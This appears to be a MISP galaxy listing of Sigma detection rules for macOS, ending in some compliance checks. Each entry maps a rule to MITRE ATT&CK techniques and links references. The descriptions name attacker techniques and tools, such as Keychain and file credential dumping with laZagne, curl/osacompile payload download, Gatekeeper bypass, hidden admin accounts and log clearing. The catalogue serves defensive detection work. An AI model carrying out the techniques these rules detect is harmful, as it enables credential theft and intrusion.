https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml

Gatekeeper Bypass via Xattr

Detects macOS Gatekeeper bypass via xattr utility

The tag is: misp-galaxy:sigma-rules="Gatekeeper Bypass via Xattr"

Gatekeeper Bypass via Xattr has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"

Table 11445. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml

Root Account Enable Via Dsenableroot

Detects attempts to enable the root account via "dsenableroot"

The tag is: misp-galaxy:sigma-rules="Root Account Enable Via Dsenableroot"

Root Account Enable Via Dsenableroot has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 11446. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md

https://ss64.com/osx/dsenableroot.html

https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml

MacOS Network Service Scanning

Detects enumeration of local or remote network services.

The tag is: misp-galaxy:sigma-rules="MacOS Network Service Scanning"

MacOS Network Service Scanning has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 11447. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml

Suspicious Browser Child Process - MacOS

Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.

The tag is: misp-galaxy:sigma-rules="Suspicious Browser Child Process - MacOS"

Suspicious Browser Child Process - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11448. Table References

Links

https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml

https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml

JAMF MDM Potential Suspicious Child Process

Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.

The tag is: misp-galaxy:sigma-rules="JAMF MDM Potential Suspicious Child Process"

Table 11449. Table References

Links

https://www.zoocoup.org/casper/jamf_cheatsheet.pdf

https://github.com/MythicAgents/typhon/

https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml

Suspicious Execution via macOS Script Editor

Detects when the macOS Script Editor utility spawns an unusual child process.

The tag is: misp-galaxy:sigma-rules="Suspicious Execution via macOS Script Editor"

Suspicious Execution via macOS Script Editor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553" with estimative-language:likelihood-probability="almost-certain"

Table 11450. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685

https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml

Potential Persistence Via PlistBuddy

Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via PlistBuddy"

Potential Persistence Via PlistBuddy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"

Table 11451. Table References

Links

https://www.manpagez.com/man/8/PlistBuddy/

https://redcanary.com/blog/clipping-silver-sparrows-wings/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml

Guest Account Enabled Via Sysadminctl

Detects attempts to enable the guest account using the sysadminctl utility

The tag is: misp-galaxy:sigma-rules="Guest Account Enabled Via Sysadminctl"

Guest Account Enabled Via Sysadminctl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"

Table 11452. Table References

Links

https://ss64.com/osx/sysadminctl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml

Binary Padding - MacOS

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.

The tag is: misp-galaxy:sigma-rules="Binary Padding - MacOS"

Binary Padding - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 11453. Table References

Links

https://linux.die.net/man/1/dd

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md

https://linux.die.net/man/1/truncate

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml

Creation Of A Local User Account

Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:sigma-rules="Creation Of A Local User Account"

Creation Of A Local User Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 11454. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md

https://ss64.com/osx/sysadminctl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml

System Information Discovery Using System_Profiler

Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.

The tag is: misp-galaxy:sigma-rules="System Information Discovery Using System_Profiler"

System Information Discovery Using System_Profiler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

Table 11455. Table References

Links

https://ss64.com/mac/system_profiler.html

https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf

https://objective-see.org/blog/blog_0x62.html

https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/

https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af

https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml

Potential Discovery Activity Using Find - MacOS

Detects usage of "find" binary in a suspicious manner to perform discovery

The tag is: misp-galaxy:sigma-rules="Potential Discovery Activity Using Find - MacOS"

Potential Discovery Activity Using Find - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11456. Table References

Links

https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml

Hidden User Creation

Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option

The tag is: misp-galaxy:sigma-rules="Hidden User Creation"

Hidden User Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

Table 11457. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml

Suspicious History File Operations

Detects commandline operations on shell history files

The tag is: misp-galaxy:sigma-rules="Suspicious History File Operations"

Suspicious History File Operations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

Table 11458. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml

Potential Base64 Decoded From Images

Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.

The tag is: misp-galaxy:sigma-rules="Potential Base64 Decoded From Images"

Potential Base64 Decoded From Images has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11459. Table References

Links

https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior

https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml

System Network Connections Discovery - MacOs

Detects usage of system utilities to discover system network connections

The tag is: misp-galaxy:sigma-rules="System Network Connections Discovery - MacOs"

System Network Connections Discovery - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 11460. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml

System Network Discovery - macOS

Detects enumeration of local network configuration

The tag is: misp-galaxy:sigma-rules="System Network Discovery - macOS"

System Network Discovery - macOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 11461. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml

Potential XCSSET Malware Infection

Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.

The tag is: misp-galaxy:sigma-rules="Potential XCSSET Malware Infection"

Table 11462. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml

Credentials In Files

Detecting attempts to extract passwords with grep and laZagne

The tag is: misp-galaxy:sigma-rules="Credentials In Files"

Credentials In Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11463. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml

User Added To Admin Group Via Dscl

Detects attempts to create and add an account to the admin group via "dscl"

The tag is: misp-galaxy:sigma-rules="User Added To Admin Group Via Dscl"

User Added To Admin Group Via Dscl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 11465. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos

https://ss64.com/osx/dscl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml

File Time Attribute Change

Detect file time attribute change to hide new or changes to existing files

The tag is: misp-galaxy:sigma-rules="File Time Attribute Change"

File Time Attribute Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 11466. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml

Payload Decoded and Decrypted via Built-in Utilities

Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.

The tag is: misp-galaxy:sigma-rules="Payload Decoded and Decrypted via Built-in Utilities"

Payload Decoded and Decrypted via Built-in Utilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 11467. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml

Space After Filename - macOS

Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.

The tag is: misp-galaxy:sigma-rules="Space After Filename - macOS"

Space After Filename - macOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Space after Filename - T1036.006" with estimative-language:likelihood-probability="almost-certain"

Table 11468. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml

Potential In-Memory Download And Compile Of Payloads

Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware

The tag is: misp-galaxy:sigma-rules="Potential In-Memory Download And Compile Of Payloads"

Potential In-Memory Download And Compile Of Payloads has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11469. Table References

Links

https://redcanary.com/blog/mac-application-bundles/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml

Local Groups Discovery - MacOs

Detects enumeration of local system groups

The tag is: misp-galaxy:sigma-rules="Local Groups Discovery - MacOs"

Local Groups Discovery - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 11470. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml

Scheduled Cron Task/Job - MacOs

Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.

The tag is: misp-galaxy:sigma-rules="Scheduled Cron Task/Job - MacOs"

Scheduled Cron Task/Job - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11471. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml

Decode Base64 Encoded Text -MacOs

Detects usage of base64 utility to decode arbitrary base64-encoded text

The tag is: misp-galaxy:sigma-rules="Decode Base64 Encoded Text -MacOs"

Decode Base64 Encoded Text -MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 11472. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml

Macos Remote System Discovery

Detects the enumeration of other remote systems.

The tag is: misp-galaxy:sigma-rules="Macos Remote System Discovery"

Macos Remote System Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 11473. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml

User Added To Admin Group Via DseditGroup

Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.

The tag is: misp-galaxy:sigma-rules="User Added To Admin Group Via DseditGroup"

User Added To Admin Group Via DseditGroup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 11474. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos

https://ss64.com/osx/dseditgroup.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml

Split A File Into Pieces

Detection use of the command "split" to split files into parts and possible transfer.

The tag is: misp-galaxy:sigma-rules="Split A File Into Pieces"

Split A File Into Pieces has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 11475. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml

Suspicious Installer Package Child Process

Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters

The tag is: misp-galaxy:sigma-rules="Suspicious Installer Package Child Process"

Suspicious Installer Package Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11476. Table References

Links

https://redcanary.com/blog/clipping-silver-sparrows-wings/

https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml

GUI Input Capture - macOS

Detects attempts to use system dialog prompts to capture user credentials

The tag is: misp-galaxy:sigma-rules="GUI Input Capture - macOS"

GUI Input Capture - macOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

Table 11477. Table References

Links

https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml

User Added To Admin Group Via Sysadminctl

Detects attempts to create and add an account to the admin group via "sysadminctl"

The tag is: misp-galaxy:sigma-rules="User Added To Admin Group Via Sysadminctl"

User Added To Admin Group Via Sysadminctl has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 11478. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos

https://ss64.com/osx/sysadminctl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml

Local System Accounts Discovery - MacOs

Detects enumeration of local systeam accounts on MacOS

The tag is: misp-galaxy:sigma-rules="Local System Accounts Discovery - MacOs"

Local System Accounts Discovery - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 11479. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml

Potential WizardUpdate Malware Infection

Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.

The tag is: misp-galaxy:sigma-rules="Potential WizardUpdate Malware Infection"

Table 11480. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97

https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/

https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml

Indicator Removal on Host - Clear Mac System Logs

Detects deletion of local audit logs

The tag is: misp-galaxy:sigma-rules="Indicator Removal on Host - Clear Mac System Logs"

Indicator Removal on Host - Clear Mac System Logs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

Table 11481. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml

System Shutdown/Reboot - MacOs

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

The tag is: misp-galaxy:sigma-rules="System Shutdown/Reboot - MacOs"

System Shutdown/Reboot - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 11482. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml

Disable Security Tools

Detects disabling security tools

The tag is: misp-galaxy:sigma-rules="Disable Security Tools"

Disable Security Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11483. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml

Credentials from Password Stores - Keychain

Detects passwords dumps from Keychain

The tag is: misp-galaxy:sigma-rules="Credentials from Password Stores - Keychain"

Credentials from Password Stores - Keychain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"

Table 11484. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md

https://gist.github.com/Capybara/6228955

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml

JAMF MDM Execution

Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.

The tag is: misp-galaxy:sigma-rules="JAMF MDM Execution"

Table 11485. Table References

Links

https://www.zoocoup.org/casper/jamf_cheatsheet.pdf

https://github.com/MythicAgents/typhon/

https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_usage.yml

Network Sniffing - MacOs

Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

The tag is: misp-galaxy:sigma-rules="Network Sniffing - MacOs"

Network Sniffing - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 11486. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml

Default Credentials Usage

Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.

The tag is: misp-galaxy:sigma-rules="Default Credentials Usage"

Table 11487. Table References

Links

https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists

https://www.cisecurity.org/controls/cis-controls-list/

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml

Host Without Firewall

Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.

The tag is: misp-galaxy:sigma-rules="Host Without Firewall"

Table 11488. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml

Cleartext Protocol Usage Via Netflow

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.

